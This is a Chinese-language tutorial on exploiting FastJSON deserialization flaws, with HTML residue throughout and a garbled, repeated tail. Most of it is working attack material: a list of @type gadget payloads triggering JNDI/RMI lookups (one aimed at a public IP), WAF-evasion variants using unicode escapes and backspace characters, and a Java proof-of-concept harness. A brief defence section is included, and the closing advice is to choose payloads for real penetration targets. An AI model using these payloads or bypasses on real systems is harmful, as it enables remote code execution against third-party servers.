FastJSON 反序列化漏洞绕过技巧详解<\/h1>

1. FastJSON 漏洞概述<\/h2>
FastJSON 是阿里巴巴开源的一个高性能 JSON 处理库，但在其历史版本中存在多个反序列化漏洞，攻击者可以通过精心构造的 JSON 数据实现远程代码执行。<\/p>

2. 已知公开的 FastJSON 漏洞 Payload<\/h2>

以下是不同 FastJSON 版本中已知的利用 Payload：<\/p>

\/\/ 基础 Payload
<\/span><\/span><\/span><\/span>{"@type"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>,"dataSourceName"<\/span>:"rmi:\/\/localhost:1099\/Exploit"<\/span>,"autoCommit"<\/span>:true<\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 1.2.42 版本绕过
<\/span><\/span><\/span><\/span>{"@type"<\/span>:"LLcom.sun.rowset.RowSetImpl;;"<\/span>,"dataSourceName"<\/span>:"rmi:\/\/localhost:1099\/Exploit"<\/span>,"autoCommit"<\/span>:true<\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 1.2.25-1.2.43 版本绕过
<\/span><\/span><\/span><\/span>{"@type"<\/span>:"[com.sun.rowset.RowSetImpl"<\/span>,"dataSourceName"<\/span>:"rmi:\/\/localhost:1099\/Exploit"<\/span>,"autoCommit"<\/span>:true<\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 其他变种
<\/span><\/span><\/span><\/span>{"@type"<\/span>:"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory"<\/span>,"properties"<\/span>:{"data_source"<\/span>:"rmi:\/\/localhost:1099\/Exploit"<\/span>}}
<\/span><\/span>{"@type"<\/span>:"Lcom.sun.rowset.RowSetImpl;"<\/span>,"dataSourceName"<\/span>:"rmi:\/\/localhost:1099\/Exploit"<\/span>,"autoCommit"<\/span>:true<\/span>}
<\/span><\/span>{"@type"<\/span>:"com.zaxxer.hikari.HikariConfig"<\/span>,"metricRegistry"<\/span>:"rmi:\/\/127.0.0.1:1099\/Exploit"<\/span>}  \/\/ 1.2.60
<\/span><\/span><\/span><\/span>{"@type"<\/span>:"org.apache.commons.configuration.JNDIConfiguration"<\/span>,"prefix"<\/span>:"rmi:\/\/127.0.0.1:1099\/Exploit"<\/span>}  \/\/ 1.2.60
<\/span><\/span><\/span><\/span>{"@type"<\/span>:"org.apache.commons.configuration2.JNDIConfiguration"<\/span>,"prefix"<\/span>:"rmi:\/\/127.0.0.1:1099\/Exploit"<\/span>}  \/\/ 1.2.61
<\/span><\/span><\/span><\/span>{"@type"<\/span>:"org.apache.xbean.propertyeditor.JndiConverter"<\/span>,"asText"<\/span>:"rmi:\/\/localhost:1099\/Exploit"<\/span>}  \/\/ 1.2.62
<\/span><\/span><\/span><\/span>{"@type"<\/span>:"br.com.anteros.dbcp.AnterosDBCPConfig"<\/span>,"healthCheckRegistry"<\/span>:"rmi:\/\/localhost:1099\/Exploit"<\/span>}
<\/span><\/span>{"@type"<\/span>:"br.com.anteros.dbcp.AnterosDBCPConfig"<\/span>,"metricRegistry"<\/span>:"rmi:\/\/localhost:1099\/Exploit"<\/span>}
<\/span><\/span>{"@type"<\/span>:"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig"<\/span>,"properties"<\/span>:{"UserTransaction"<\/span>:"rmi:\/\/localhost:1099\/Exploit"<\/span>}}
<\/span><\/span><\/code><\/pre>3. WAF 绕过技巧<\/h2>
3.1 基础绕过方法<\/h3>


Unicode 编码绕过<\/strong>：<\/p>
{"@\x74ype"<\/span>:"org.apache.commons.configuration.JNDIConfiguration"<\/span>,"prefix"<\/span>:"rmi:\/\/111.231.17.208:3888"<\/span>}
<\/span><\/span><\/code><\/pre><\/li>

特殊字符插入<\/strong>：

通过 Fuzz 测试发现可以在 @type<\/code> 后的冒号前后插入特殊字符实现绕过：<\/p>
{"@type"<\/span>:\b<\/span>"com.sun.rowset.JdbcRowSetImpl"<\/span>,"dataSourceName"<\/span>:"rmi:\/\/127.0.0.1:9999"<\/span>,"autoCommit"<\/span>:true<\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.2 绕过原理分析<\/h3>
绕过点位于 FastJSON 的 skipWhitespace<\/code> 方法（com.alibaba.fastjson.parser.JSONLexerBase<\/code> 类中），该方法会跳过特定的空白字符：<\/p>
public<\/span> void<\/span> skipWhitespace<\/span>()<\/span> {<\/span>
<\/span><\/span>    for<\/span> (;;)<\/span> {<\/span>
<\/span><\/span>        if<\/span> (<\/span>ch ==<\/span> ' '<\/span> ||<\/span> ch ==<\/span> '\n'<\/span> ||<\/span> ch ==<\/span> '\r'<\/span> ||<\/span> ch ==<\/span> '\t'<\/span> ||<\/span> ch ==<\/span> '\f'<\/span> ||<\/span> ch ==<\/span> '\b'<\/span>)<\/span> {<\/span>
<\/span><\/span>            next();<\/span>
<\/span><\/span>        }<\/span> else<\/span> {<\/span>
<\/span><\/span>            break<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>其中 \b<\/code> (退格符) 是被该方法识别并跳过的空白字符之一，因此可以插入到关键位置实现绕过。<\/p>
3.3 Fuzz 测试方法<\/h3>

构建一个带 UI 界面的 Fuzz 工具，插入各种脏字符进行测试<\/li>
使用无回显的命令执行验证方式（如监听 nc）<\/li>
观察 FastJSON 是否对外发起 DNS 请求来判断漏洞是否存在<\/li>
<\/ol>
4. 漏洞验证环境搭建<\/h2>
4.1 依赖配置<\/h3>
<dependency><\/span>
<\/span><\/span>   <groupId><\/span>com.alibaba<\/groupId><\/span>
<\/span><\/span>   <artifactId><\/span>fastjson<\/artifactId><\/span>
<\/span><\/span>   <version><\/span>1.2.23<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>4.2 测试代码<\/h3>
import<\/span> com.alibaba.fastjson.JSON;<\/span>
<\/span><\/span>import<\/span> com.alibaba.fastjson.parser.ParserConfig;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> exp<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args){<\/span>
<\/span><\/span>        String poc =<\/span> "{\"@type\":\\b\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi:\/\/10.251.0.111:9999\",\"autoCommit\":true}"<\/span>;<\/span>
<\/span><\/span>        ParserConfig.<\/span>global<\/span>.<\/span>setAutoTypeSupport<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        JSON.<\/span>parseObject<\/span>(<\/span>poc);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5. 防御建议<\/h2>

升级到 FastJSON 最新安全版本<\/li>
禁用 autoType<\/code> 功能：ParserConfig.getGlobalInstance().setAutoTypeSupport(false);<\/code><\/li>
使用白名单机制限制反序列化类<\/li>
WAF 规则应覆盖各种变形 Payload，包括：

Unicode 编码变种<\/li>
特殊字符插入变种<\/li>
类名混淆变种<\/li>
<\/ul>
<\/li>
<\/ol>
6. 参考资源<\/h2>

FastJson 反序列化学习 - lmxspace<\/a><\/li>
先知社区相关技术文章<\/li>
Vulhub 漏洞环境<\/li>
<\/ol>
通过以上方法，可以有效地测试和验证 FastJSON 反序列化漏洞，并了解如何绕过常见的 WAF 防护规则。在实际渗透测试中，应根据目标环境的具体情况选择合适的 Payload 和绕过方法。<\/p>

FastJSON 反序列化漏洞绕过技巧详解<\/h1>

1. FastJSON 漏洞概述<\/h2> FastJSON 是阿里巴巴开源的一个高性能 JSON 处理库，但在其历史版本中存在多个反序列化漏洞，攻击者可以通过精心构造的 JSON 数据实现远程代码执行。<\/p>

3. WAF 绕过技巧<\/h2>

4. 漏洞验证环境搭建<\/h2>

1. FastJSON 漏洞概述<\/h2>
FastJSON 是阿里巴巴开源的一个高性能 JSON 处理库，但在其历史版本中存在多个反序列化漏洞，攻击者可以通过精心构造的 JSON 数据实现远程代码执行。<\/p>